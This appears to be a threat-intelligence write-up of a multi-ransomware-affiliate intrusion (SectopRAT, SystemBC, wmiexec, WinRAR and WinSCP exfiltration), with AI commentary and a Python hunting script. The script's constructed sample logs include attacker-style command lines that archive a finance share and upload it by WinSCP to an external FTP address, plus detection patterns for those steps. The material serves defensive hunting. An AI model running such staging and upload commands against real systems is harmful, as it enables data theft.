
Blurring the Lines: Intrusion Shows Connection With Three Major Ransomware Gangs

NetmanageIT OpenCTI - opencti.netmanageit.com




SUMMARY :

An intrusion began with a user downloading and executing a malicious file impersonating DeskSoft's EarthTime application, which deployed SectopRAT malware. The threat actor used multiple malware families, including SystemBC and Betruger, and various tools for reconnaissance and lateral movement. They moved across systems using RDP and Impacket's wmiexec, maintaining persistence through local account creation and startup folder shortcuts. Data was collected using WinRAR and exfiltrated via WinSCP to an FTP server. The discovery of tools linked to Play ransomware, DragonForce ransomware, and RansomHub suggests the threat actor was likely an affiliate operating across multiple ransomware groups.

OPENCTI LABELS :

sectoprat,ransomware,betruger,multi-group affiliation,data exfiltration,grixba,lateral movement,systembc


AI COMMENTARY :

1. This commentary covers the intrusion titled "Blurring the Lines: Intrusion Shows Connection With Three Major Ransomware Gangs", in which a single malicious download grew into a multi-stage intrusion that used several malware families and tooling tied to more than one ransomware operation. The case illustrates how affiliates move between ransomware programs and why attribution to a single gang based on tooling alone is increasingly unreliable.

2. The intrusion began when a user executed a malicious file disguised as DeskSoft's EarthTime application. On launch it deployed SectopRAT, which gave the actor an initial command-and-control foothold from which to run reconnaissance and stage lateral movement.

3. Beyond SectopRAT, the actor deployed SystemBC and Betruger, and used Grixba, a network-scanning and information-gathering tool previously associated with Play ransomware, for reconnaissance. Lateral movement relied on Remote Desktop Protocol (RDP) sessions and Impacket's wmiexec. Persistence was established by creating local user accounts and dropping shortcuts into Startup folders so that access survived reboots.

4. Once positioned in the environment, the adversary staged data with WinRAR and transferred the archives with WinSCP to an FTP server under their control. Because both are legitimate, widely deployed utilities, the collection and exfiltration steps are easy to overlook unless their command lines and network destinations are examined.

5. A striking aspect of this campaign is the discovery of tools linked to Play ransomware, DragonForce ransomware, and RansomHub. The overlap points to an affiliate operating across several ransomware-as-a-service programs rather than a single brand, which blurs the traditional boundaries between gangs and complicates attribution.

6. Defenders should assume that a ransomware affiliate can draw on an eclectic toolset and switch programs quickly. Hunting should therefore focus on the behaviours that persist across brands: cmd.exe spawned by WmiPrvSE.exe (the wmiexec pattern), new local accounts followed by RDP logons, shortcuts written to Startup folders, WinRAR archiving of file shares, and WinSCP sessions to external FTP servers. Correlating these stages per host, and enriching them with intelligence on multi-group affiliations, gives the best chance of interrupting the operator before encryption or extortion.
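The following is an added example, not code from the report or from NetmanageIT, showing how the post-compromise stages described in points 3, 4 and 6 (wmiexec lateral movement, local account creation, Startup-folder shortcuts, WinRAR staging and WinSCP-to-FTP transfer) can be correlated per host. The telemetry lines, the pipe-separated key=value layout, the host names and the 203.0.113.10 address are all constructed for this example and are not indicators from the report. The one real-world detail it relies on is Impacket wmiexec's default behaviour of redirecting command output to \\127.0.0.1\ADMIN$\__<timestamp>, together with the standard Sysmon event IDs (1 process create, 11 file create) and Security event 4720 (user account created).

```python
"""Per-host correlation of the TTP chain from the report (added example).

Log lines are constructed; their "key=value | key=value" layout is an
assumption for the example, not any product's real format.
"""
import re
from collections import defaultdict

# Constructed sample telemetry: one process-creation or security event per line.
SAMPLE_LOGS = [
    "host=WS01 | event=1 | image=C:\\Windows\\System32\\cmd.exe"
    " | parent=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"
    " | cmdline=cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1718123456.12 2>&1",
    "host=WS01 | event=4720 | target_user=svc_backup | subject_user=jdoe",
    "host=WS01 | event=11 | image=C:\\Windows\\explorer.exe"
    " | target_file=C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Windows"
    "\\Start Menu\\Programs\\Startup\\update.lnk",
    "host=FS02 | event=1 | image=C:\\Program Files\\WinRAR\\Rar.exe"
    " | parent=C:\\Windows\\System32\\cmd.exe"
    " | cmdline=Rar.exe a -r -hp C:\\ProgramData\\f.rar D:\\Shares\\Finance",
    "host=FS02 | event=1 | image=C:\\Users\\Public\\WinSCP.exe"
    " | parent=C:\\Windows\\System32\\cmd.exe"
    " | cmdline=WinSCP.exe /command \"open ftp://203.0.113.10\" \"put C:\\ProgramData\\f.rar\" exit",
    # Benign control: cmd.exe launched interactively from explorer.exe.
    "host=WS03 | event=1 | image=C:\\Windows\\System32\\cmd.exe"
    " | parent=C:\\Windows\\explorer.exe | cmdline=cmd.exe /c dir",
]

# wmiexec.py by default writes command output to the ADMIN$ share under a
# "__<timestamp>" file name, which shows up verbatim in the child command line.
WMIEXEC_OUTPUT = re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d+", re.IGNORECASE)
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.IGNORECASE)


def parse_line(line):
    """Split one 'k=v | k=v' line into a dict (only the first '=' separates)."""
    rec = {}
    for field in line.split(" | "):
        key, _, value = field.partition("=")
        rec[key.strip()] = value.strip()
    return rec


def classify(rec):
    """Return the names of the hunting rules that fire on one parsed record."""
    hits = []
    event = rec.get("event")
    image = rec.get("image", "").lower()
    parent = rec.get("parent", "").lower()
    cmdline = rec.get("cmdline", "")

    # Stage: lateral movement via Impacket wmiexec (WmiPrvSE.exe -> cmd.exe -> ADMIN$ output).
    if event == "1" and parent.endswith("\\wmiprvse.exe") and WMIEXEC_OUTPUT.search(cmdline):
        hits.append("wmiexec_lateral_movement")
    # Stage: persistence via a newly created account (Security 4720).
    if event == "4720":
        hits.append("local_account_created")
    # Stage: persistence via a .lnk written into a Startup folder (Sysmon 11).
    if event == "11" and STARTUP_LNK.search(rec.get("target_file", "")):
        hits.append("startup_folder_shortcut")
    # Stage: collection, WinRAR invoked with the "a" (add to archive) command.
    if event == "1" and image.endswith(("\\rar.exe", "\\winrar.exe")) and re.match(r"^\S+\s+a\b", cmdline):
        hits.append("winrar_staging")
    # Stage: exfiltration, WinSCP driven from the command line towards an ftp:// target.
    if event == "1" and image.endswith("\\winscp.exe") and "ftp://" in cmdline.lower():
        hits.append("winscp_ftp_exfil")
    return hits


def hunt(lines):
    """Map each host to the set of distinct stages observed on it."""
    per_host = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        for rule in classify(rec):
            per_host[rec.get("host", "?")].add(rule)
    return dict(per_host)


def prioritize(per_host, min_stages=2):
    """Hosts showing at least min_stages different stages go to the top of the triage queue."""
    return sorted(h for h, rules in per_host.items() if len(rules) >= min_stages)


if __name__ == "__main__":
    findings = hunt(SAMPLE_LOGS)
    for host in prioritize(findings):
        print(host, sorted(findings[host]))
```

Each rule on its own is noisy (administrators create accounts and run WinRAR), so the value is in `prioritize`: a host where two or more independent stages of the chain appear is far more likely to be part of the intrusion than one firing a single rule. Tune `min_stages` and add a time window once the rules are pointed at real EDR or Sysmon data.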



